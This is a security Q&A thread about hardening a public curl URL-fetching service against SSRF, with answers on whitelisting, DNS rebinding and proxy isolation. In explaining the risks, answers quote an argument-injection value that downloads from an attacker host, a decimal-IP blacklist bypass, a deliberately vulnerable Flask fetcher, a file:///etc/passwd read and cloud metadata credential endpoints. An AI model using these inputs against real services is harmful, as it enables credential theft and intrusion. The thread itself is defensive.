Can a curl request to an arbitrary url made sufficiently safe?

Question

This is a follow up of another topic (Is allowing unfiltered curl request from a website a vulnerability?) on which I am doing some private research.

Given:

A publicly reachable webservice that accepts any url and performs a curl get request on it. The service operates without authentication.

The linked topic already states that unfiltered access is a security issue. But something on this topic surfaces my thoughts periodically and it took me a while to think about: Can such a service made sufficiently secure against SSRF and alike?

Obvious steps:

cURL is mighty, restrict allowed schemes to http(s) and ftp (solves file, gopher, dict, etc. issues)
prevent access to entire loopback: localhost, 127.0.0.1-127.0.0.255 (I was totally unaware that the entire network of 127.x.x.x points to your machine 0_o)
prevent access to 0.0.0.0
disallow broadcast IP 255.255.255.255 (although unlikely that something serves anything on the allowed schemes above)
prevent private IPs to avoid access to internal networks (impersonalization of a server, which is part of the private network?) -> 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16 (thanks wiki)

But there is more, right?

if cURL is configured to follow redirects, the redirect must be validated the same way as the original IP, since forging a redirect is trivial
IPv6: Everything for the nice old IPv4 address space must be redone there too, right?
Are there some ports to filter by? Remember schemes are restricted to http(s) and ftp. This may still technically be a port scanner but not necessary malicious but getting a website from port 675 might be ok.
Prevent DoS remote urls: Implement some sort of token (CSRF token alike), introduce timeouts between multiple requests, say 1 second or ban IPs which keep hammering. (Does of course not solve DDoS, but preventing DDoS is probably outside of the scope here)

One last thing I cannot fully get my head around:

What's with DNS? Is it possible to register a DNS entry to point to localhost or private networks?

On my machine I technically can perform a GET of http://my.box and get my router. Now how can somebody mitigate that risk?

Is performing a nslookup a solution? If I get an IP, validate the IP. If not, it may be anything, deny. I keep forgetting what my NAS does so I can reach it via host name in my local network, but being paranoid is probably a good way here.

score 4 · Answer 1 · answered Feb 17 '16 at 17:37

SSRF could only be mitigated with a (regularly updated) white list of hosts or URL's which are known to be safe, i.e. which don't have any side effects which depend on the source IP and where access to a URL will not cause an abuse report, law suite or similar against your site (for example because someone tries to find hidden pages on a site or making bomb threats).

A black list will help but is is not sufficient.

score 3 · Answer 2 · answered Feb 18 '16 at 02:44

To add to what Steffen said, and provide some examples, you want to do a whitelist if at all possible. Blacklisting, like what you are proposing, can be bypassed.

For example:

http://2915201827/ - This is a valid website. Do you know which website it is?

Also, the tool as described is a proxy. Without throttling, someone could use this tool to perform attacks against another application and your site would be the one with the bulls eye from law enforcement. US courts have not been very kind to the "but it was open wifi, anybody could have done it" excuse, so there is precedent for it.

You need to be very careful with how you invoke cURL, and ideally, use a library instead of the command line tool. For example:

runtime.exec("curl " + url);

in Java wouldn't allow a user to enter this: ; ls blah/, but it would allow a user to enter this:

-O /tmp/asdf http://attacker.example.com/hahaipwn.txt.

Final words:

There's a lot to consider with such a service.

My bad, my scenario I modelled wouldn't execute curl via system call but use a php extension, so injecting anything else beside the url should be no issue. But thanks for the hint. The url you mentioned is of course opaque to the curl request but if it is not a private IP it should be a website like any other. It is not that the curl result is executed on server which would of course cause even more issues. — Samuel, Feb 18 '16 at 10:03

score 3 · Answer 3 · answered Feb 18 '16 at 09:57

if cURL is configured to follow redirects, the redirect must be validated the same way as the original IP, since forging a redirect is trivial

Yes. You'd be best off not getting curl to follow redirects and instead manually check the Location header when a redirect is encountered.

IPv6: Everything for the nice old IPv4 address space must be redone there too, right?

Yes, if you're supporting IPv6.

Are there some ports to filter by? Remember schemes are restricted to http(s) and ftp. This may still technically be a port scanner but not necessary malicious but getting a website from port 675 might be ok. Prevent DoS remote urls: Implement some sort of token (CSRF token alike), introduce timeouts between multiple requests, say 1 second or ban IPs which keep hammering. (Does of course not solve DDoS, but preventing DDoS is probably outside of the scope here)

Depends on the functionality you're trying to support. You could detect multiple attempts either from the same IP or to the same IP and the rate limit them, possibly showing them a CAPTCHA after a while.

One last thing I cannot fully get my head around:

What's with DNS? Is it possible to register a DNS entry to point to localhost or private networks?

Yes. It is perfectly possible to point an A record at a private address. Furthermore it is possible to point an unrelated domain at a private address and then point a CNAME at that domain, causing this, in effect, to resolve to the private address.

On my machine I technically can perform a GET of http://my.box and get my router. Now how can somebody mitigate that risk?

You should isolate the machine serving the requests to its own subnet. This would only have access to an internet gateway which is configured to only route traffic out onto the public internet.

Is performing a nslookup a solution? If I get an IP, validate the IP. If not, it may be anything, deny. I keep forgetting what my NAS does so I can reach it via host name in my local network, but being paranoid is probably a good way here.

Yes, as long as you explicitly tell curl to follow that IP.

You need the lookup and the curl request to be unified. Otherwise an attacker could possibly set a very low TTL (Time To Live) and update the DNS record before curl runs to fetch it. Otherwise you would also get problems with entries caching.

For example, the --resolve curl parameter allows you to specify the hostname and port separately so you can connect to the previously resolved, validated IP but make curl perform like you you've told it the full hostname. From the man page:

--resolve Provide a custom address for a specific host and port pair. Using this, you can make the curl requests(s) use a specified address and prevent the otherwise normally resolved address to be used. Consider it a sort of /etc/hosts alternative provided on the command line. The port number should be the number used for the specific protocol the host will be used for. It means you need several entries if you want to provide address for the same host but different ports.

This option can be used many times to add many host names to resolve.

(Added in 7.21.3)

e.g. curl --resolve www.example.com:443:203.0.113.24 https://www.example.com/

Of course all of the above does not prevent abuse reports from being filed against you from target hosts. For example, there is always the risk that someone might use your service as a proxy in order to exploit another server (e.g. via SQL injection). Although not infallible, you should create and retain full audit logs for use of your service.

Thanks for the detailed replay. Sounds technically difficult to make this waterproof. For what would I keep audit logs? I would expect that an attacker would proxy the access to such a service anyway. Or do the audit logs server a different purpose? — Samuel, Feb 18 '16 at 12:13
They probably would proxy to your service, however at least you are doing your part and are recording what has happened. Additionally, it allows you to investigate should anyone try circumventing the controls to prevent SSRF that you have in place. — SilverlightFox, Feb 18 '16 at 13:56
Now I wonder whether having terms of service disallowing such behaviour and full audit logs is able to protect you in any way from the "liability of disturbance" or "breach of duty of care", or whatever it is called in English. — Samuel, Feb 18 '16 at 14:29

Marat Mkhitaryan · Answer 4 · 2019-09-11T14:10:27.810

"Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing." https://portswigger.net/web-security/ssrf

This is an example of an app which is vulnerable to SSRF:

from flask import Flask, escape, request
import requests 
app = Flask(__name__)

@app.route('/')
def hello():
    url = request.args['url']
    return request.get(url).text

It takes parameter "url" and makes a http request to user entered URL. The impact of this vulnerability depends ~. For an example if this web app had an elasticsearch installed with it an attacker could run some bad commands on it, but if an app had some fetch client which can get files from local filesystem like requests.get("file://etc/passwd") that takes us to another level of vulnerability solidy!

To understand the impact you can seek into some SSRF reports on H1 https://www.google.com/search?q=site%3Ahackerone.com+ssrf

As a developer you need to make internal network unavailable for the user entered requests. Some guys advise you to make a blacklist of hosts which you should disallow make requests to, but I pretend you from doing blacklisting. Because:

there are so many ways to bypass such as stupid thing as blacklist! For an example in the work there are so many WAFs but they can be bypassed by humans via some tricks! In SSRF there are also so many tricks to bypass blacklist which are listed here: https://twitter.com/search?q=ssrf I like this one http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ lol :)
And also this is not a good practice to solve problem via just "sealing" a security hole! If you have got a security hole you should think, and change your design!

So in my opinion the right solution for this is using proxy! Please note I'm talking about local instance of proxy, to pretend internal requests and allow only external not to pretend IP leaking (please note that this is also a problem you can fix by buying proxy list or making own proxy network which can not be one point of failure DDOSed via L3, L4)!

There are many ways to set up your own squid proxy instance but please note that your http proxy must be accesible only by your application, not to the internet :) So close it using iptables to only your own network infrastructure using it.

So in short you need to disallow local network for your squid http proxy and make your app send http requests through it!

 proxies = {
  'http': 'http://my_local_squid_instance:3128',
}
request.get(url, proxies=proxies, timeout=10).text

(I also recommend you using queues or coroutines while you do stuff like fetching because we do not know if external server will respond in few minutes or few minutes :) (so you should add timeout for external requests to also pretend DOS))

P.S I was also making a pet project which had user's URL fetching functionality and I wanted to understand how to properly fix that stuff! Some guys wornder why I recomend Squid proxy. The answer is that I know a big real world app that uses it: VK.com uses squid proxy to fetch external data, you can ensure in it by using https://webhook.site, you will see the User-Agent is squid proxy :)

Why squid? Any proxy would do. However, simply to fake your IP, maybe tor is more feasible. But afaik this question has the focus on the defensive side. — peterh, Apr 13 '19 at 15:03
You did not understand. Squid proxy is not to change ur IP! Squid proxy is to block any internal network requests! I mean via requests.get(unsafeURL) user can put any internal URL into unsafeURL and it will be fetched! But if we will have squid proxy via reuests.get(unsafeURL,proxy="suqidproxy") it could not be fetched because squid proxy does not allow internal requests on NETWORK level! Or at least you can configure squid proxy to do ONLY EXTERNAL requests! — Marat Mkhitaryan, Sep 11 '19 at 13:11
(Note, I did not vote to your post.) Possibly, that we really did not understand. I suggest to elaborate your answer, so you might collect also upvotes. The important thing is: you need to formulate your answer so that most voters understand it. And, honestly, many of them are smart. Only your answer is too short. — peterh, Sep 11 '19 at 13:22

score 1 · Answer 5 · edited Jun 16 '20 at 09:49

I agree with Steffen Ullrich's answer - blacklisting leaves too many holes, and it will only be a matter of time until you encounter an unexpected "Gotcha". This is true in general for security, as proper defense in depth should start from the perspective of least privilege. Rather than asking "What shouldn't the user do?" it's much safer to ask "What should the user do?" and stop everything else.

I'll add to your list though as there is another very dangerous avenue that you would need to watch out for if you are blacklisting, and this example should help bring home the importance of white-listing.

Metadata Endpoints in Cloud Hosting Environments

Something relatively new introduced to cloud hosting environments are meta-data URLs designed to aid in CI/CD and related infrastructure maintenance. These API endpoints are internal-only endpoints that give VPS's and other kinds of computing resources information about themselves, including the access keys that were used to launch them.

These guys are quite complicated, and they are an ideal endpoint for hackers who find an SSRF vulnerability. Moreover, none of the rules you mentioned in your post would block access to them. Some brief details:

For Google Cloud the Metadata URL lives at http://metadata.google.internal/computeMetadata/v1/project/. Docs are here.
For AWS the Metadata URL lives at http://169.254.169.254/latest/meta-data/. Docs are here.

To make it clear that these things are quite dangerous:

Here is a bug report that goes into abusing a metadata endpoint in detail
And here is a very short summary of a bug report on hackerone where Shopify paid out $25,000 as a result of an SSRF vulnerability that gave access to the metadata endpoint on AWS, leading quickly to full root privileges for the attacker.

Summary

The take away here isn't just that metadata endpoints are dangerous (they are, and if you are hosting in a cloud environment then you need to know about them). Rather, the point is that blacklisting is not a very effective strategy. These metadata endpoints aren't blocked by any of the rules in your original post, but they are very dangerous, and vary from hosting provider to hosting provider. That means that you may have what seems to be a completely effective blacklist, but doing something as innocuous as switching hosting providers may end up making you completely vulnerable once again.

In short, the list of "dangerous" things you need to block can be endless. The list of actual things your application needs to do is probably much shorter. Unless you have a very compelling reason, it's much easier to focus on the list of things you are supposed to do, instead of the infinite list of things you shouldn't do.

Can a curl request to an arbitrary url made sufficiently safe?

5 Answers5

Metadata Endpoints in Cloud Hosting Environments

Summary

Linked